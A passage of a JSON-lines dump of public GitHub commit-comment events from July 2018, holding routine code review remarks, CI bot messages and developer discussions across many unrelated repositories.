GHC/GHCJS on this, because I personally care about those languages. Besides those and C / C++, you won't catch me doing anything heavy.\r\n\r\n`binutils-wrapper` is mostly fine because linkers don't come with libraries. The only oddity is the interpreter been built with libc. There's no reason I know of we couldn't make SOs and fix up the interpreter after the fact, but we don't, and thus have a longer bootstrapping critical path than we would otherwise.\r\n\r\n`cc-wrapper` is much more of a mess, but our LLVM builds as of recently do everything I want: neither Clang or LLVM is built with or depends on compiler-rt and GCC's libraries. So that just leaves breaking up GCC à la this, or the more radical plan of bootstrapping everything with Clang and building GCC for things that need it after. I'm honestly fine with that, but I assume it would be more controversial."}},"created_at":"2018-07-27T20:23:14Z"}
{"id":"8030623940","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863573,"position":47,"line":47,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:23:35Z","updated_at":"2018-07-27T20:23:35Z","author_association":"NONE","body":"Вот задание дефолт аргументов не самая хорошая идея. Нам лучше, что-б поезд не создался вообще, чем создался с типом \"passenger/freight\". Дальше нам нужно будет цеплять вагоны подходящего типа (в следующем задании) к поезду, и как мы поймем какие вагоны цеплять к \"passenger/freight\" поезду?"}},"created_at":"2018-07-27T20:23:35Z"}
{"id":"8030650327","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29863625,"position":null,"line":null,"path":null,"commit_id":"4b45181656db870940dd177825ec2a7a4dc120ec","created_at":"2018-07-27T20:29:56Z","updated_at":"2018-07-27T20:29:56Z","author_association":"MEMBER","body":"I see, thanks."}},"created_at":"2018-07-27T20:29:56Z"}
{"id":"8030651975","type":"CommitCommentEvent","actor":{"login":"Catfriend1"},"repo":{"name":"syncthing/syncthing-android"},"payload":{"comment":{"id":29863632,"position":null,"line":null,"path":null,"commit_id":"a9a863ace95174d5742dc38e90280b5949dc1b79","created_at":"2018-07-27T20:30:19Z","updated_at":"2018-07-27T20:30:19Z","author_association":"CONTRIBUTOR","body":"@AudriusButkevicius As there wasn't any review I just leave a sidenote. I would rather have nativeBinaryCanWriteToPath return immediately true without doing the shell stuff."}},"created_at":"2018-07-27T20:30:19Z"}
{"id":"8030654173","type":"CommitCommentEvent","actor":{"login":"davidedc"},"repo":{"name":"pabloahb/Algebrite"},"payload":{"comment":{"id":29863634,"position":65,"line":177,"path":"runtime/symbol.coffee","commit_id":"06ba764949e66e7df5f24eac8f926b685a8f45d8","created_at":"2018-07-27T20:30:50Z","updated_at":"2018-07-27T20:30:50Z","author_association":"NONE","body":"I like this commit. Question: \"set_symbols\" has been renamed but I still see it referenced here?"}},"created_at":"2018-07-27T20:30:50Z"}
{"id":"8030655339","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863637,"position":100,"line":100,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:31:08Z","updated_at":"2018-07-27T20:31:08Z","author_association":"NONE","body":"В последних трех методах не нужно выводит станцию, а нужно ее вернуть."}},"created_at":"2018-07-27T20:31:08Z"}
{"id":"8030655736","type":"CommitCommentEvent","actor":{"login":"johnnynotsolucky"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29863640,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-27T20:31:13Z","updated_at":"2018-07-27T20:31:13Z","author_association":"COLLABORATOR","body":"I've updated the README with the new controller URL (Craft3 routes actions slightly differently) and a few other small changes. As @sjcallender mentioned, we've added Crafts `redirectToPostedUrl` to allow POST requests to pass through to another action.\r\n\r\nThe Image Science related code has been removed, I wasn't sure about the specifics, and it would also need to be ported to be used. I think though that you should be able to hook into the completed event?"}},"created_at":"2018-07-27T20:31:13Z"}
{"id":"8030655810","type":"CommitCommentEvent","actor":{"login":"sorawee"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":29863641,"position":null,"line":null,"path":null,"commit_id":"ff4ebe58962d3a603f5d64810714731285884011","created_at":"2018-07-27T20:31:14Z","updated_at":"2018-07-27T20:31:14Z","author_association":"CONTRIBUTOR","body":"1. Have you tested when there's no data point?\r\n2. `max - min / table.length` will be parsed as `max - (min / table.length)`, I think? Is that what you want?\r\n3. Assuming you meant `(max - min) / table.length`, I don't understand why you divide by `table.length`. Let's say you have `[1, 101]`. This will make `minNumBuckets = 50`. On the other hand, when you have `[1, 2, ..., 101]`. This will make `minNumBuckets ~ 1`. Is that what you actually want?"}},"created_at":"2018-07-27T20:31:14Z"}
{"id":"8030659967","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29863646,"position":17,"line":17,"path":"src/test/java/com/crud/tasks/mapper/TaskMapperTestSuite.java","commit_id":"550c62d84538cca5e9271fe8100287fc77796bd7","created_at":"2018-07-27T20:32:15Z","updated_at":"2018-07-27T20:32:15Z","author_association":"NONE","body":"Czemu InjectMocks?"}},"created_at":"2018-07-27T20:32:15Z"}
{"id":"8030664139","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29863651,"position":null,"line":null,"path":null,"commit_id":"76a31c1e7755c0741c30c7e38dc90318d2854e3e","created_at":"2018-07-27T20:33:22Z","updated_at":"2018-07-27T20:33:22Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1018](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1018).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1018-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T20:33:22Z"}
{"id":"8030665159","type":"CommitCommentEvent","actor":{"login":"sorawee"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":29863654,"position":null,"line":null,"path":null,"commit_id":"ff4ebe58962d3a603f5d64810714731285884011","created_at":"2018-07-27T20:33:34Z","updated_at":"2018-07-27T20:33:34Z","author_association":"CONTRIBUTOR","body":"Also, personally I want to have a default value in our library to match up Google's default value because in our framework, it is possible to alter a default setting to non-default setting, but not the other way around."}},"created_at":"2018-07-27T20:33:34Z"}
{"id":"8030666441","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863657,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:33:52Z","updated_at":"2018-07-27T20:33:52Z","author_association":"CONTRIBUTOR","body":"This should still be there even if you are using a Dockerimage."}},"created_at":"2018-07-27T20:33:52Z"}
{"id":"8030667866","type":"CommitCommentEvent","actor":{"login":"AudriusButkevicius"},"repo":{"name":"syncthing/syncthing-android"},"payload":{"comment":{"id":29863661,"position":null,"line":null,"path":null,"commit_id":"a9a863ace95174d5742dc38e90280b5949dc1b79","created_at":"2018-07-27T20:34:14Z","updated_at":"2018-07-27T20:34:14Z","author_association":"MEMBER","body":"Too late now."}},"created_at":"2018-07-27T20:34:14Z"}
{"id":"8030668349","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863662,"position":82,"line":82,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:34:21Z","updated_at":"2018-07-27T20:34:21Z","author_association":"NONE","body":"Тут у нас будет проверка, если в метод next_station вернет нам станцию (если эта станция последняя next_station должен вернуть нам nil). И дальше будут использоваться методы станции по принятию поезда и отъезду поезда (которых пока нет). И будет инкрементироваться индекс текущей станции"}},"created_at":"2018-07-27T20:34:21Z"}
{"id":"8030669549","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863664,"position":88,"line":88,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:34:39Z","updated_at":"2018-07-27T20:34:39Z","author_association":"NONE","body":"Почти тоже, что и в go_ahead только наоборот"}},"created_at":"2018-07-27T20:34:39Z"}
{"id":"8030678308","type":"CommitCommentEvent","actor":{"login":"jrtc27"},"repo":{"name":"CTSRD-CHERI/llvm"},"payload":{"comment":{"id":29863690,"position":6,"line":296,"path":"lib/Transforms/CHERICap/FoldCapIntrinsics.cpp","commit_id":"472034857d0d258a90e2e1f4a5037ff82c726f6f","created_at":"2018-07-27T20:36:49Z","updated_at":"2018-07-27T20:36:49Z","author_association":"MEMBER","body":"Yes because we just matched it with a `cheri_cap_offset_set` intrinsic. Regarding a test case I don’t think it’s really necessary; the code was just trying to remove the wrong instruction which ended up with dire consequences."}},"created_at":"2018-07-27T20:36:49Z"}
{"id":"8030678551","type":"CommitCommentEvent","actor":{"login":"johnkgamble"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863691,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:36:53Z","updated_at":"2018-07-27T20:36:53Z","author_association":"MEMBER","body":"They're going to be installed upstream by conda... I definitely don't want to pip install everything again. It isn't currently smart enough to know not to reinstall everything, which takes forever."}},"created_at":"2018-07-27T20:36:53Z"}
{"id":"8030681306","type":"CommitCommentEvent","actor":{"login":"abersch"},"repo":{"name":"calhist/mods_xml"},"payload":{"comment":{"id":29863698,"position":null,"line":null,"path":null,"commit_id":"ba4038f868e5c75ed7439eb4d9e40ea0939ce41f","created_at":"2018-07-27T20:37:33Z","updated_at":"2018-07-27T20:37:33Z","author_association":"NONE","body":"added line for findingAid "}},"created_at":"2018-07-27T20:37:33Z"}
{"id":"8030682700","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863703,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:37:53Z","updated_at":"2018-07-27T20:37:53Z","author_association":"CONTRIBUTOR","body":"Conda does recognize if something is installed with pip."}},"created_at":"2018-07-27T20:37:53Z"}
{"id":"8030684627","type":"CommitCommentEvent","actor":{"login":"johnkgamble"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863712,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:38:20Z","updated_at":"2018-07-27T20:38:20Z","author_association":"MEMBER","body":"Other way - does pip recognize conda installs?"}},"created_at":"2018-07-27T20:38:20Z"}
{"id":"8030685386","type":"CommitCommentEvent","actor":{"login":"johnkgamble"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863716,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:38:32Z","updated_at":"2018-07-27T20:38:32Z","author_association":"MEMBER","body":"It definitely wasn't for me."}},"created_at":"2018-07-27T20:38:32Z"}
{"id":"8030686556","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863722,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:38:49Z","updated_at":"2018-07-27T20:38:49Z","author_association":"CONTRIBUTOR","body":"That should also work!"}},"created_at":"2018-07-27T20:38:49Z"}
{"id":"8030688979","type":"CommitCommentEvent","actor":{"login":"davidedc"},"repo":{"name":"ribrdb/Algebrite"},"payload":{"comment":{"id":29863733,"position":null,"line":null,"path":null,"commit_id":"fcbec7cc775a1df57c052d98fa405d93f3905eba","created_at":"2018-07-27T20:39:26Z","updated_at":"2018-07-27T20:39:26Z","author_association":"NONE","body":"@ribrdb Just out of curiosity what was the case for reverting this? Did it break anything or give unexpected behaviour?"}},"created_at":"2018-07-27T20:39:26Z"}
{"id":"8030689003","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863734,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:39:27Z","updated_at":"2018-07-27T20:39:27Z","author_association":"CONTRIBUTOR","body":"If not, everything would become an absolute mess and you'll have double copies of basically everything."}},"created_at":"2018-07-27T20:39:27Z"}
{"id":"8030690004","type":"CommitCommentEvent","actor":{"login":"elcharles1"},"repo":{"name":"elcharles1/web-page"},"payload":{"comment":{"id":29863738,"position":null,"line":null,"path":null,"commit_id":"ca6a43fdd7131ed2b248b591a0595fb59cd34c9e","created_at":"2018-07-27T20:39:42Z","updated_at":"2018-07-27T20:39:42Z","author_association":"OWNER","body":"ah mira, que bien..."}},"created_at":"2018-07-27T20:39:42Z"}
{"id":"8030690909","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863742,"position":17,"line":17,"path":"Part_4/Railway_with_comments.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:39:56Z","updated_at":"2018-07-27T20:39:56Z","author_association":"NONE","body":"Это кстати не по дурацкий, а очень правильно!"}},"created_at":"2018-07-27T20:39:56Z"}
{"id":"8030691068","type":"CommitCommentEvent","actor":{"login":"johnkgamble"},"repo":{"name":"Microsoft/qmt"},"payload":{"comment":{"id":29863743,"position":null,"line":null,"path":null,"commit_id":"c906dd2b554c7ed4aaeedcdacca53417cc1232b3","created_at":"2018-07-27T20:39:58Z","updated_at":"2018-07-27T20:39:58Z","author_association":"MEMBER","body":"It doesn't... we can fix it later though. That's why I'm skipping pip entirely right now. There are some higher priority things that I need to deal with."}},"created_at":"2018-07-27T20:39:58Z"}
{"id":"8030691904","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29863748,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T20:40:11Z","updated_at":"2018-07-27T20:40:11Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T20:40:11Z"}
{"id":"8030691929","type":"CommitCommentEvent","actor":{"login":"maxCardo"},"repo":{"name":"maxCardo/MCGWebsiteVersion2"},"payload":{"comment":{"id":29863749,"position":null,"line":null,"path":null,"commit_id":"001dd0e386460f746e75c6bfc3166a50069d0f3f","created_at":"2018-07-27T20:40:12Z","updated_at":"2018-07-27T20:40:12Z","author_association":"OWNER","body":"test test"}},"created_at":"2018-07-27T20:40:12Z"}
{"id":"8030692267","type":"CommitCommentEvent","actor":{"login":"ramya-rao-a"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29863752,"position":4,"line":7,"path":"product.json","commit_id":"1098de4c11814d2a77af773d1bcfccabf5677621","created_at":"2018-07-27T20:40:16Z","updated_at":"2018-07-27T20:40:16Z","author_association":"MEMBER","body":"@jrieken @joaomoreno We added this early this milestone believing that the absence of ai key will ensure telemetry is not sent when running from source. But extensions dont have the same guard and will send telemetry once this is enabled. So reverting this."}},"created_at":"2018-07-27T20:40:16Z"}
{"id":"8030696921","type":"CommitCommentEvent","actor":{"login":"fitzgen"},"repo":{"name":"rustwasm/wasm-bindgen"},"payload":{"comment":{"id":29863758,"position":null,"line":null,"path":null,"commit_id":"e6b32873d97184893a9e02287047124d81db4de8","created_at":"2018-07-27T20:41:23Z","updated_at":"2018-07-27T20:41:23Z","author_association":"MEMBER","body":"Perfect, thank you!"}},"created_at":"2018-07-27T20:41:23Z"}
{"id":"8030697744","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863759,"position":151,"line":151,"path":"Part_4/Railway_with_comments.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T20:41:35Z","updated_at":"2018-07-27T20:41:35Z","author_association":"NONE","body":"Это станция отправляет и принимает поезд, так-что методы именно ей и нужны. "}},"created_at":"2018-07-27T20:41:35Z"}
{"id":"8030702696","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29863771,"position":12,"line":207,"path":"ast.rkt","commit_id":"e0ec4d20a2d904da7e99c5774c02ccaf644f03e0","created_at":"2018-07-27T20:42:47Z","updated_at":"2018-07-27T20:42:47Z","author_association":"OWNER","body":"Int stands for \"Internal\" not \"Integer\". `ret-ty` is the return type."}},"created_at":"2018-07-27T20:42:47Z"}
{"id":"8030706507","type":"CommitCommentEvent","actor":{"login":"muesugi"},"repo":{"name":"muesugi/yelp-mealpal"},"payload":{"comment":{"id":29863783,"position":4,"line":72,"path":"src/inject/inject.js","commit_id":"2b6f54ae4d51d2c83a3b911586defd00ec43f994","created_at":"2018-07-27T20:43:42Z","updated_at":"2018-07-27T20:43:42Z","author_association":"OWNER","body":"this change was put in place as a fix for a reload bug"}},"created_at":"2018-07-27T20:43:42Z"}
{"id":"8030706800","type":"CommitCommentEvent","actor":{"login":"jomatruva"},"repo":{"name":"connortodd0304/PortfolioCV"},"payload":{"comment":{"id":29863784,"position":null,"line":null,"path":null,"commit_id":"407a04b7536c4ce5a81455b3aec44fe64891f5bc","created_at":"2018-07-27T20:43:47Z","updated_at":"2018-07-27T20:43:47Z","author_association":"NONE","body":"How yo upload my open software ?"}},"created_at":"2018-07-27T20:43:47Z"}
{"id":"8030707031","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29863785,"position":9,"line":5,"path":"Lesson_2/vowels.rb","commit_id":"c6acab8f3d799181c9671a739735b72d56f8b7ed","created_at":"2018-07-27T20:43:50Z","updated_at":"2018-07-27T20:43:50Z","author_association":"NONE","body":"Многострочные блоки принято писать через do/end"}},"created_at":"2018-07-27T20:43:50Z"}
{"id":"8030708612","type":"CommitCommentEvent","actor":{"login":"nikoniko75"},"repo":{"name":"stax76/stax76"},"payload":{"comment":{"id":29863789,"position":null,"line":null,"path":null,"commit_id":"7f66d8661b7406afffec310f002953c3fb3024fc","created_at":"2018-07-27T20:44:14Z","updated_at":"2018-07-27T20:44:14Z","author_association":"NONE","body":"Hello\r\nI have a problem with STAXRIP\r\nthe crop works but once trim the edges cropper are contrasting it comes out\r\nthank you in advance"}},"created_at":"2018-07-27T20:44:14Z"}
{"id":"8030715192","type":"CommitCommentEvent","actor":{"login":"SergoWicked"},"repo":{"name":"SergoWicked/my-github"},"payload":{"comment":{"id":29863809,"position":4,"line":4,"path":"README.md","commit_id":"8076fbfc48c7cac25a188243b4ed233ae2d6c156","created_at":"2018-07-27T20:45:49Z","updated_at":"2018-07-27T20:45:49Z","author_association":"OWNER","body":"Sublime Text 3"}},"created_at":"2018-07-27T20:45:49Z"}
{"id":"8030718444","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29863812,"position":null,"line":null,"path":null,"commit_id":"1160741a5e0d365c5c0157c193f5c40e19c04fd6","created_at":"2018-07-27T20:46:39Z","updated_at":"2018-07-27T20:46:39Z","author_association":"COLLABORATOR","body":"- Action types readded: `OVERLAY_INITIALIZE`, `OVERLAY_CONNECTED`\r\n\r\n## New strings\r\n- `FOCUS_PARTICIPANT: \"Focus Participant\"` -> `FOCUS_PARTICIPANT: \"Focus This Person\"`\r\n- `UNFOCUS_PARTICIPANT: \"Unfocus Participant\"` -> `UNFOCUS_PARTICIPANT: \"Unfocus Participant\"`\r\n- `CAPTCHA_ISSUES: \"Having issues with CAPTCHA?\"`\r\n- `CAPTCHA_PROBLEMS: \"CAPTCHA Problems?\"`\r\n- `CAPTCHA_PROBLEMS_INFO: \"If you have 99 problems with completing CAPTCHA (or maybe just 1), like no Google Play Services or a custom ROM, you can complete it in your mobile browser.\"`\r\n- `CAPTCHA_OPEN_BROWSER: \"Open Browser\"`"}},"created_at":"2018-07-27T20:46:39Z"}
{"id":"8030719632","type":"CommitCommentEvent","actor":{"login":"ScottCarrollMBA"},"repo":{"name":"maxCardo/MCGWebsiteVersion2"},"payload":{"comment":{"id":29863815,"position":null,"line":null,"path":null,"commit_id":"001dd0e386460f746e75c6bfc3166a50069d0f3f","created_at":"2018-07-27T20:46:56Z","updated_at":"2018-07-27T20:46:56Z","author_association":"NONE","body":"That’s interesting, it came to my regular email inbox.\n\nSent from my iPhone\n\n> On Jul 27, 2018, at 4:40 PM, maxCardo <notifications@github.com> wrote:\n> \n> test test\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-27T20:46:56Z"}
{"id":"8030726313","type":"CommitCommentEvent","actor":{"login":"julienXX"},"repo":{"name":"julienXX/gophsters"},"payload":{"comment":{"id":29863838,"position":7,"line":123,"path":"src/main.rs","commit_id":"f1c4dce394108836bf6de4a59ca950995ccd6570","created_at":"2018-07-27T20:48:28Z","updated_at":"2018-07-27T20:48:28Z","author_association":"OWNER","body":"@zx2c4 Oh nice thanks for bringing that up!"}},"created_at":"2018-07-27T20:48:28Z"}
{"id":"8030728441","type":"CommitCommentEvent","actor":{"login":"ck3587"},"repo":{"name":"ck3587/hello-world"},"payload":{"comment":{"id":29863848,"position":null,"line":null,"path":null,"commit_id":"7c5111580fd3bd607d740e7e1e021c4ef37ebbdd","created_at":"2018-07-27T20:48:58Z","updated_at":"2018-07-27T20:48:58Z","author_association":"OWNER","body":"Change approved"}},"created_at":"2018-07-27T20:48:58Z"}
{"id":"8030730338","type":"CommitCommentEvent","actor":{"login":"peter-hawthorne"},"repo":{"name":"hawthorne-git/hawthorne-admin"},"payload":{"comment":{"id":29863855,"position":null,"line":null,"path":null,"commit_id":"270b91505ba842c685c8ba87b7f265c8658f6369","created_at":"2018-07-27T20:49:27Z","updated_at":"2018-07-27T20:49:27Z","author_association":"CONTRIBUTOR","body":"removed ACTIVE_SHIPPING, not storage. Commit comment typo."}},"created_at":"2018-07-27T20:49:27Z"}
{"id":"8030732896","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29863862,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-27T20:50:07Z","updated_at":"2018-07-27T20:50:07Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.32%25-green.png)</a>\n"}},"created_at":"2018-07-27T20:50:07Z"}
{"id":"8030732924","type":"CommitCommentEvent","actor":{"login":"kimdaeman14"},"repo":{"name":"kimdaeman14/fastGit"},"payload":{"comment":{"id":29863863,"position":null,"line":null,"path":null,"commit_id":"dfd7941bf7dcb90fe872c59a67af7c1b70fb16ac","created_at":"2018-07-27T20:50:08Z","updated_at":"2018-07-27T20:50:08Z","author_association":"OWNER","body":"kkk"}},"created_at":"2018-07-27T20:50:08Z"}
{"id":"8030733930","type":"CommitCommentEvent","actor":{"login":"TBRC-JimK"},"repo":{"name":"BuddhistDigitalResourceCenter/drs-deposit"},"payload":{"comment":{"id":29863865,"position":null,"line":null,"path":null,"commit_id":"aad1efcc79f0f382ffd3efb0eed495df4f57cd28","created_at":"2018-07-27T20:50:22Z","updated_at":"2018-07-27T20:50:22Z","author_association":"COLLABORATOR","body":"Addresses #63 "}},"created_at":"2018-07-27T20:50:22Z"}
{"id":"8030737728","type":"CommitCommentEvent","actor":{"login":"datapointech"},"repo":{"name":"datapointech/bird"},"payload":{"comment":{"id":29863876,"position":null,"line":null,"path":null,"commit_id":"fdf6c1876175a236ca422ab63d1ed31edac11332","created_at":"2018-07-27T20:51:20Z","updated_at":"2018-07-27T20:51:20Z","author_association":"OWNER","body":"Develop a project to integrate GPS to track movement of  electric scooty "}},"created_at":"2018-07-27T20:51:20Z"}
{"id":"8030738749","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pytest-regressions-feedstock"},"payload":{"comment":{"id":29863878,"position":null,"line":null,"path":null,"commit_id":"319b0871f3b054ac00259a3b6dfd3800f7a79c35","created_at":"2018-07-27T20:51:37Z","updated_at":"2018-07-27T20:51:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @tadeu, @nicoddemus were added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T20:51:37Z"}
{"id":"8030739147","type":"CommitCommentEvent","actor":{"login":"gfgtdf"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29863883,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-27T20:51:43Z","updated_at":"2018-07-27T20:51:43Z","author_association":"CONTRIBUTOR","body":"> I don't see a loadstring() function anywhere in Lua manual.\r\n\r\nloadstring is an alias for load for compatability with older lua versions. in older lua manuls you will likely find it.\r\n\r\n> It's intentional that loading from streams isn't supported (but I'll implement it if you think it's important).\r\n\r\nno it's ok. i dont really have concreate usecase for that.\r\n"}},"created_at":"2018-07-27T20:51:43Z"}
{"id":"8030756286","type":"CommitCommentEvent","actor":{"login":"cdavis4"},"repo":{"name":"cdavis4/Group4_Project"},"payload":{"comment":{"id":29863927,"position":null,"line":null,"path":null,"commit_id":"39471a3f1108ff490c3a1e6277a4e8501eacc6da","created_at":"2018-07-27T20:55:48Z","updated_at":"2018-07-27T20:55:48Z","author_association":"OWNER","body":"I think survive and moveCount mean the same thing. We can use moveCount if it makes more sense."}},"created_at":"2018-07-27T20:55:48Z"}
{"id":"8030756393","type":"CommitCommentEvent","actor":{"login":"DEcSENT"},"repo":{"name":"DEcSENT/WorkoutTimer"},"payload":{"comment":{"id":29863928,"position":16,"line":16,"path":"app/src/main/kotlin/com/dvinc/workouttimer/presentation/model/exercise/ExerciseTypeUi.kt","commit_id":"f2c29164353827345bc0f5e5f789f2b99f83cbb2","created_at":"2018-07-27T20:55:50Z","updated_at":"2018-07-27T20:55:50Z","author_association":"OWNER","body":"Fix this wrong name."}},"created_at":"2018-07-27T20:55:50Z"}
{"id":"8030758214","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29863934,"position":231,"line":623,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"10f41a4068c7cf19e21bbac54dd7b1998ecebbe9","created_at":"2018-07-27T20:56:18Z","updated_at":"2018-07-27T20:56:18Z","author_association":"COLLABORATOR","body":"Should all of this really be in the `try...except` block for checking if `bfautocorrmap` exists?"}},"created_at":"2018-07-27T20:56:18Z"}
{"id":"8030759702","type":"CommitCommentEvent","actor":{"login":"arichardson"},"repo":{"name":"CTSRD-CHERI/llvm"},"payload":{"comment":{"id":29863936,"position":6,"line":296,"path":"lib/Transforms/CHERICap/FoldCapIntrinsics.cpp","commit_id":"472034857d0d258a90e2e1f4a5037ff82c726f6f","created_at":"2018-07-27T20:56:39Z","updated_at":"2018-07-27T20:56:39Z","author_association":"MEMBER","body":"Ah right of course. However I do think we should have at least one test that causes the setoffset folding to be triggered. You have a reduced test case that you used to reproduce this crash right?  Checking that in as a test for the folding would be good. We don't have great code coverage (especially when it comes to optimization passes) so anything that improves it is extremely useful.\r\n"}},"created_at":"2018-07-27T20:56:39Z"}
